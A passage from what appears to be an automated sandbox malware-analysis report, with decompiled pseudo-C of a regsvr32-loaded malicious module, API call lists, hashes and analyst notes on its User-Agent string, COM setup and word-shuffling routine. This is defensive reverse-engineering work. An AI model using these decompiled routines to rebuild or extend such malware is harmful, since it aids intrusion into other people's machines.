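CMP_RE = re.compile(r"==\s*(0x[0-9a-f]+)", re.I)
API_RE = re.compile(r"^(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-F]+)", re.M)


def decode_dword(value):
    """Render a 32-bit value as the four bytes it occupies in memory (little-endian)."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    return "".join(chr(b) if 0x20 <= b < 0x7F else "\\x%02x" % b for b in raw)


def string_hints(listing):
    """(dst, displacement, decoded) for every pointer hint whose dword is printable text."""
    hits = []
    for m in HINT_RE.finditer(listing):
        dst, _base, disp, hint = m.groups()
        decoded = decode_dword(int(hint, 16))
        if "\\x" not in decoded:  # skip hints such as "// 0x0" that are not string starts
            hits.append((dst, int(disp, 16), decoded))
    return hits


def named_constants(listing):
    """Map every literal the listing compares against to its Win32 / HRESULT name, if known."""
    names = {}
    for m in CMP_RE.finditer(listing):
        v = int(m.group(1), 16)
        if v in WIN32_ERRORS:
            names[v] = WIN32_ERRORS[v]
        elif v in HRESULTS:
            names[v] = HRESULTS[v]
    return names


def explain_query_level(level):
    """Split an HttpQueryInfo dwInfoLevel into its base attribute and modifier flags."""
    base = level & 0x0FFFFFFF
    flags = [name for bit, name in HTTP_QUERY_FLAGS.items() if level & bit]
    return HTTP_QUERY_LEVELS.get(base, "0x%x" % base), flags


def annotate_apis(text):
    """(ref, function, note) per API entry; HttpQueryInfoA info levels are expanded by name."""
    rows = []
    for m in API_RE.finditer(text):
        func, _mod, args, ref = m.groups()
        argv = [a.strip() for a in args.split(",")]
        note = ""
        if func == "HttpQueryInfoA" and argv[1] != "?":
            name, flags = explain_query_level(int(argv[1], 16))
            note = " | ".join([name] + flags)
        rows.append((ref, func, note))
    return rows


if __name__ == "__main__":
    for dst, disp, text in string_hints(SAMPLE_LISTING):
        print("%s = base + 0x%x -> %r" % (dst, disp, text))
    print(named_constants(SAMPLE_LISTING))
    for row in annotate_apis(SAMPLE_APIS):
        print(row)
```

Run on the lines above it reports that the wsprintfA format in E02BD2F70 starts with "Mozi", that 0x3e5 is ERROR_IO_PENDING, and that the first HttpQueryInfoA call asks for the numeric status code while the second pulls the raw response headers.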

                                 Control-flow Graph
                                 (graph image not reproduced; basic blocks 0x02bd2f70-0x02bd314a, calling E02BD59A4, E02BD2B6F, E02BD9154, E02BD8E0D, CloseHandle, E02BD1525, memset, RtlInitializeCriticalSection, E02BD8B7B, RtlAllocateHeap, wsprintfA, E02BD7A2E, E02BD7FBE, E02BD50E8, E02BD46B2 and E02BD7C3D; the executed/not-executed colouring is lost)
                                C-Code - Quality: 57%
                                			E02BD2F70(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				CHAR* _t54;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t62;
                                				CHAR* _t65;
                                				CHAR* _t66;
                                				char* _t67;
                                				void* _t68;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E02BD59A4();
                                				if(_t21 != 0) {
                                 					_t59 =  *0x2bdd25c; // 0x4000000a (OS version word; the low byte 0x0a is consistent with the Windows 10 analysis host)
                                 					_t55 = (_t59 & 0xf0000000) + _t21;
                                 					 *0x2bdd25c = (_t59 & 0xf0000000) + _t21; // keep the top nibble of flags, replace the rest with E02BD59A4's result
                                 				}
                                 				_t22 =  *0x2bdd160(0, 2); // import pointer called as f(NULL, 2); the accepted results below make this almost certainly CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)
                                 				_v16 = _t22;
                                 				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) { // S_OK, S_FALSE (already initialised) or RPC_E_CHANGED_MODE all allowed to proceed
                                					_t25 = E02BD2B6F( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                 					_t26 =  *0x2bdd2a8; // 0x242a5a8 (base of the string area; the hints below are the first four bytes at each address, little-endian)
                                 					if( *0x2bdd25c > 5) {
                                 						_t8 = _t26 + 0x2bde5cd; // 0x4d283a53 = "S:(M"
                                 						_t27 = _t8;
                                 					} else {
                                 						_t7 = _t26 + 0x2bde9f5; // 0x44283a44 = "D:(D"
                                 						_t27 = _t7;
                                 					}
                                					E02BD9154(_t27, _t27);
                                					_t31 = E02BD8E0D(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t62 = 5;
                                					if(_t54 != _t62) {
                                 						 *0x2bdd270 =  *0x2bdd270 ^ 0x81bbe65d; // global key/seed masked with a fixed constant before E02BD7A2E uses it below
                                 						_t32 = E02BD1525(0x60); // allocate the 0x60-byte global context (stored at 0x2bdd32c, used by E02BD1128 above)
                                 						 *0x2bdd32c = _t32;
                                 						__eflags = _t32;
                                 						if(_t32 == 0) {
                                 							_push(8);
                                 							_pop(0); // push 8 / pop eax: status 8 == ERROR_NOT_ENOUGH_MEMORY
                                 						} else {
                                 							memset(_t32, 0, 0x60);
                                 							_t49 =  *0x2bdd32c; // 0x50095b0
                                 							_t68 = _t68 + 0xc;
                                 							__imp__(_t49 + 0x40); // RtlInitializeCriticalSection(ctx + 0x40), per the control-flow graph
                                 							_t51 =  *0x2bdd32c; // 0x50095b0
                                 							 *_t51 = 0x2bde81a; // first field points at a fixed structure inside the module
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                 							_t36 = RtlAllocateHeap( *0x2bdd238, 0, 0x43); // 0x43-byte buffer on the private heap for the formatted string
                                 							 *0x2bdd2c8 = _t36;
                                 							__eflags = _t36;
                                 							if(_t36 == 0) {
                                 								_push(8);
                                 								_pop(0); // status 8 == ERROR_NOT_ENOUGH_MEMORY
                                 							} else {
                                 								_t56 =  *0x2bdd25c; // 0x4000000a
                                 								_t61 = _t56 & 0x000000ff; // OS version byte
                                 								_t58 =  *0x2bdd2a8; // 0x242a5a8
                                 								_t13 = _t58 + 0x2bde55a; // 0x697a6f4d = "Mozi": the format string begins "Mozi", consistent with the Mozilla-style User-Agent the signatures flag
                                 								_t55 = _t13;
                                 								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2bdc287);
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E02BD7A2E( ~_v8 &  *0x2bdd270,  &E02BDD00C); // executed
                                								_t42 = E02BD7FBE(_t55); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E02BD50E8(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t65 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E02BD7C3D(_t61, _t65, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t65;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
                                									_t54 = E02BD46B2(__eflags,  &(_t65[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t66 = _v12;
                                						if(_t66 == 0) {
                                							L30:
                                							if(_v16 == 0 || _v16 == 1) {
                                								 *0x2bdd15c();
                                							}
                                							goto L34;
                                						}
                                						_t67 =  &(_t66[4]);
                                						do {
                                						} while (E02BD8B7B(_t62, _t67, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 02BD59A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,02BD2F89,00000000,00000000), ref: 02BD59B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02BD3006
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • memset.NTDLL ref: 02BD3055
                                • RtlInitializeCriticalSection.NTDLL(05009570), ref: 02BD3066
                                  • Part of subcall function 02BD46B2: memset.NTDLL ref: 02BD46C7
                                  • Part of subcall function 02BD46B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02BD4709
                                  • Part of subcall function 02BD46B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02BD4714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02BD3091
                                • wsprintfA.USER32 ref: 02BD30C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 4b871b1bc4c72e4155a915f304db5ab387169d3a3b0b3f5490c7af672afaac3a
                                • Instruction ID: 700c20b5b9a0018441b53bdddbc2c712dcc227ec517186f9ce989f188c2d237d
                                • Opcode Fuzzy Hash: 4b871b1bc4c72e4155a915f304db5ab387169d3a3b0b3f5490c7af672afaac3a
                                • Instruction Fuzzy Hash: 0E512276E82216ABDB20ABB4DC99BEE7BE8EB04744F0448E5E541D7142F770C984CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                C-Code - Quality: 22%
                                			E02BD2D74(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E02BD1525(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E02BD8B22(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E02BD1525((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x2bdd278 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}

                                APIs
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 02BD2E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 02BD2E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 02BD2E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 02BD2EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 796d5848361c914a0c212636da0bdfa9006fb47507ed4d0ae4e862a2eedbf086
                                • Instruction ID: 2370a80d0a54777f7a98ab330801ff98fdcca340e36425a95896f6ba6c2646f7
                                • Opcode Fuzzy Hash: 796d5848361c914a0c212636da0bdfa9006fb47507ed4d0ae4e862a2eedbf086
                                • Instruction Fuzzy Hash: 4D51A271A00158EBCF11CFA9C8847EDBBB6FF55318F15809AEC159B202E7309A51CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD5319(void* __edx) {
                                				void* _v8;
                                				int _v12;
                                				WCHAR* _v16;
                                				void* __edi;
                                				void* __esi;
                                				void* _t23;
                                				intOrPtr _t24;
                                				void* _t26;
                                				intOrPtr _t32;
                                				intOrPtr _t35;
                                				intOrPtr _t38;
                                				intOrPtr _t42;
                                				void* _t45;
                                				void* _t50;
                                				void* _t52;
                                
                                				_t50 = __edx;
                                				_v12 = 0;
                                				_t23 = E02BD155A(0,  &_v8); // executed
                                				if(_t23 != 0) {
                                					_v8 = 0;
                                				}
                                				_t24 =  *0x2bdd2a8; // 0x242a5a8
                                				_t4 = _t24 + 0x2bdedc0; // 0x5009368
                                				_t5 = _t24 + 0x2bded68; // 0x4f0053
                                				_t26 = E02BD5D79( &_v16, _v8, _t5, _t4); // executed
                                				_t45 = _t26;
                                				if(_t45 == 0) {
                                					StrToIntExW(_v16, 0,  &_v12);
                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x2bdd2a8; // 0x242a5a8
                                						_t11 = _t32 + 0x2bdedb4; // 0x500935c
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x2bded68; // 0x4f0053
                                						_t52 = E02BD272D(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x2bdd2a8; // 0x242a5a8
                                							_t13 = _t35 + 0x2bdedfe; // 0x30314549
                                							if(E02BD5B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                								_t61 =  *0x2bdd25c - 6;
                                								if( *0x2bdd25c <= 6) {
                                									_t42 =  *0x2bdd2a8; // 0x242a5a8
                                									_t15 = _t42 + 0x2bdec0a; // 0x52384549
                                									E02BD5B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x2bdd2a8; // 0x242a5a8
                                							_t17 = _t38 + 0x2bdedf8; // 0x50093a0
                                							_t18 = _t38 + 0x2bdedd0; // 0x680043
                                							_t45 = E02BD4538(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x2bdd238, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x2bdd238, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E02BD4FF0(_t54);
                                				}
                                				return _t45;
                                			}

                                0x02bd5319
                                0x02bd5329
                                0x02bd532c
                                0x02bd5333
                                0x02bd5335
                                0x02bd5335
                                0x02bd5338
                                0x02bd533d
                                0x02bd5344
                                0x02bd5351
                                0x02bd5356
                                0x02bd535a
                                0x02bd5368
                                0x02bd5376
                                0x02bd537a
                                0x02bd540b
                                0x02bd540b
                                0x02bd5380
                                0x02bd5380
                                0x02bd5385
                                0x02bd5385
                                0x02bd538c
                                0x02bd5398
                                0x02bd539a
                                0x02bd539c
                                0x02bd539e
                                0x02bd53a5
                                0x02bd53b7
                                0x02bd53b9
                                0x02bd53c0
                                0x02bd53c2
                                0x02bd53c9
                                0x02bd53d4
                                0x02bd53d4
                                0x02bd53c0
                                0x02bd53d9
                                0x02bd53de
                                0x02bd53e5
                                0x02bd5403
                                0x02bd5405
                                0x02bd5405
                                0x02bd539c
                                0x02bd5417
                                0x02bd5417
                                0x02bd5419
                                0x02bd541e
                                0x02bd5420
                                0x02bd5420
                                0x02bd542b

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05009368,00000000,?,74E5F710,00000000,74E5F730), ref: 02BD5368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050093A0,?,00000000,30314549,00000014,004F0053,0500935C), ref: 02BD5405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD7CCB), ref: 02BD5417
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 92eb54e49312665eac395bc517d51e851f55c3f6e79ad995d9a5b7626193ac11
                                • Instruction ID: 35af2d66924ecabde5544bf39cf9a7274fcae8f2bd064bfe5685a2bc6707d2f5
                                • Opcode Fuzzy Hash: 92eb54e49312665eac395bc517d51e851f55c3f6e79ad995d9a5b7626193ac11
                                • Instruction Fuzzy Hash: D631B172941109BFDB21EBD4DC84EDEBBBDEB44744F1600A9E541EB0A0F771AA54CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E02BD2C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				void* _v8;
                                				void* __edi;
                                				void* _t13;
                                				intOrPtr _t18;
                                				void* _t24;
                                				void* _t30;
                                				void* _t36;
                                				void* _t40;
                                				intOrPtr _t42;
                                
                                				_t36 = __edx;
                                				_t32 = __ecx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t42 =  *0x2bdd340; // 0x5009b20
                                				_push(0x800);
                                				_push(0);
                                				_push( *0x2bdd238);
                                				if( *0x2bdd24c >= 5) {
                                					_t13 = RtlAllocateHeap(); // executed
                                					if(_t13 == 0) {
                                						L6:
                                						_t30 = 8;
                                						L7:
                                						if(_t30 != 0) {
                                							L10:
                                							 *0x2bdd24c =  *0x2bdd24c + 1;
                                							L11:
                                							return _t30;
                                						}
                                						_t44 = _a4;
                                						_t40 = _v8;
                                						 *_a16 = _a4;
                                						 *_a20 = E02BD2C0D(_t44, _t40);
                                						_t18 = E02BD31A8(_t40, _t44);
                                						if(_t18 != 0) {
                                							 *_a8 = _t40;
                                							 *_a12 = _t18;
                                							if( *0x2bdd24c < 5) {
                                								 *0x2bdd24c =  *0x2bdd24c & 0x00000000;
                                							}
                                							goto L11;
                                						}
                                						_t30 = 0xbf;
                                						E02BD5433();
                                						HeapFree( *0x2bdd238, 0, _t40);
                                						goto L10;
                                					}
                                					_t24 = E02BD9BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                					L5:
                                					_t30 = _t24;
                                					goto L7;
                                				}
                                				if(RtlAllocateHeap() == 0) {
                                					goto L6;
                                				}
                                				_t24 = E02BD5450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                				goto L5;
                                			}

                                0x02bd2c58
                                0x02bd2c58
                                0x02bd2c5b
                                0x02bd2c5c
                                0x02bd2c66
                                0x02bd2c6d
                                0x02bd2c72
                                0x02bd2c74
                                0x02bd2c7a
                                0x02bd2c9a
                                0x02bd2ca2
                                0x02bd2cba
                                0x02bd2cbc
                                0x02bd2cbd
                                0x02bd2cbf
                                0x02bd2cfd
                                0x02bd2cfd
                                0x02bd2d03
                                0x02bd2d09
                                0x02bd2d09
                                0x02bd2cc1
                                0x02bd2cc7
                                0x02bd2cca
                                0x02bd2cd9
                                0x02bd2cdb
                                0x02bd2ce2
                                0x02bd2d16
                                0x02bd2d1b
                                0x02bd2d1d
                                0x02bd2d1f
                                0x02bd2d1f
                                0x00000000
                                0x02bd2d1d
                                0x02bd2ce4
                                0x02bd2ce9
                                0x02bd2cf7
                                0x00000000
                                0x02bd2cf7
                                0x02bd2cb1
                                0x02bd2cb6
                                0x02bd2cb6
                                0x00000000
                                0x02bd2cb6
                                0x02bd2c84
                                0x00000000
                                0x00000000
                                0x02bd2c93
                                0x00000000

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD2C7C
                                  • Part of subcall function 02BD5450: GetTickCount.KERNEL32 ref: 02BD5464
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54B4
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54D1
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD54FD
                                  • Part of subcall function 02BD5450: HeapFree.KERNEL32(00000000,?), ref: 02BD550F
                                  • Part of subcall function 02BD5450: wsprintfA.USER32 ref: 02BD5530
                                  • Part of subcall function 02BD5450: HeapFree.KERNEL32(00000000,?), ref: 02BD5540
                                  • Part of subcall function 02BD5450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD556E
                                  • Part of subcall function 02BD5450: GetTickCount.KERNEL32 ref: 02BD557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 02BD2C9A
                                • HeapFree.KERNEL32(00000000,00000002,02BD7D16,?,02BD7D16,00000002,?,?,02BD312C,?), ref: 02BD2CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 42a59a3e39731bdcbdbae37381f912512b07e1822912108d5e5baaae278eb179
                                • Instruction ID: 499b9528643eaf99d19af238f403a1b26f3e60e1ebe6c21654102aaef13cce5f
                                • Opcode Fuzzy Hash: 42a59a3e39731bdcbdbae37381f912512b07e1822912108d5e5baaae278eb179
                                • Instruction Fuzzy Hash: 8D21AC7664220AABCB119F58DC90FDA3BACEB48381F0448A6FD41D7251FB30E940DFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 02BD8A76
                                • SysAllocString.OLEAUT32(02BD4BD8), ref: 02BD8ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD8ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD8ADC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 34a85f4aa5bd453e4e5edc1f4932cd7641343a2fb9b255a44ab5d667a3bd0e3c
                                • Instruction ID: 5195684d7521c9280511496679385b4c856facc715dd1f98c0987a2a84abf43b
                                • Opcode Fuzzy Hash: 34a85f4aa5bd453e4e5edc1f4932cd7641343a2fb9b255a44ab5d667a3bd0e3c
                                • Instruction Fuzzy Hash: 6F312A72900209EFCB05DF98D8D09EE7BB9FF48345B21886AF516DB250E7319982CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E02BD4A2A(char* _a4, char** _a8) {
                                				char* _t7;
                                				char* _t11;
                                				char* _t14;
                                				char* _t16;
                                				char* _t17;
                                				char _t18;
                                				signed int _t20;
                                				signed int _t22;
                                
                                				_t16 = _a4;
                                				_push(0x20);
                                				_t20 = 1;
                                				_push(_t16);
                                				while(1) {
                                					_t7 = StrChrA();
                                					if(_t7 == 0) {
                                						break;
                                					}
                                					_t20 = _t20 + 1;
                                					_push(0x20);
                                					_push( &(_t7[1]));
                                				}
                                				_t11 = E02BD1525(_t20 << 2);
                                				_a4 = _t11;
                                				if(_t11 != 0) {
                                					StrTrimA(_t16, 0x2bdc284); // executed
                                					_t22 = 0;
                                					do {
                                						_t14 = StrChrA(_t16, 0x20);
                                						if(_t14 != 0) {
                                							 *_t14 = 0;
                                							do {
                                								_t14 =  &(_t14[1]);
                                								_t18 =  *_t14;
                                							} while (_t18 == 0x20 || _t18 == 9);
                                						}
                                						_t17 = _a4;
                                						 *(_t17 + _t22 * 4) = _t16;
                                						_t22 = _t22 + 1;
                                						_t16 = _t14;
                                					} while (_t14 != 0);
                                					 *_a8 = _t17;
                                				}
                                				return 0;
                                			}

                                0x02bd4a2e
                                0x02bd4a3b
                                0x02bd4a3d
                                0x02bd4a3e
                                0x02bd4a46
                                0x02bd4a46
                                0x02bd4a4a
                                0x00000000
                                0x00000000
                                0x02bd4a41
                                0x02bd4a42
                                0x02bd4a45
                                0x02bd4a45
                                0x02bd4a52
                                0x02bd4a57
                                0x02bd4a5c
                                0x02bd4a64
                                0x02bd4a6a
                                0x02bd4a6c
                                0x02bd4a6f
                                0x02bd4a73
                                0x02bd4a75
                                0x02bd4a78
                                0x02bd4a78
                                0x02bd4a79
                                0x02bd4a7b
                                0x02bd4a78
                                0x02bd4a85
                                0x02bd4a88
                                0x02bd4a8b
                                0x02bd4a8c
                                0x02bd4a8e
                                0x02bd4a95
                                0x02bd4a95
                                0x02bd4aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,050095AC,02BD30F3,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A46
                                • StrTrimA.SHLWAPI(?,02BDC284,00000002,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A64
                                • StrChrA.SHLWAPI(?,00000020,?,02BD1173,?,050095AC,?,02BD30F3), ref: 02BD4A6F
                                Memory Dump Source
